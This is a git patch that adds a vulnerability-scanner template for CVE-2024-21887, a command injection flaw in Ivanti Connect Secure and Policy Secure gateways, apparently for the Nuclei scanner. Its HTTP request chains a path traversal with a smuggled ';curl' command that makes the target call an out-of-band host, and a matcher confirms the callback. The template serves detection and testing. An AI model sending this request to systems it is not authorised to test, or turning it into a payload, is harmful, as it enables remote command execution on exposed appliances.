From 665e99c56812353f3ef3a6584f18392beec1775f Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Wed, 17 Jan 2024 02:23:45 +0530
Subject: [PATCH] Create CVE-2024-21887.yaml

---
 http/cves/2024/CVE-2024-21887.yaml | 32 ++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-21887.yaml

diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml
new file mode 100644
index 0000000000..1e0c868821
--- /dev/null
+++ b/http/cves/2024/CVE-2024-21887.yaml
@@ -0,0 +1,32 @@
+id: CVE-2024-21887
+
+info:
+  name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection
+  author: pdresearch, parthmalhotra, iamnoooob
+  severity: critical
+  description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x)  allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
+  reference:
+    - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
+    - https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2024-21887
+    cwe-id: CWE-77
+    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
+  metadata:
+    vendor: ivanti
+    product: connect_secure
+  tags: cve,cve2024,interactsh,kev,rce,cmdi
+
+http:
+  - raw:
+      - |
+        GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"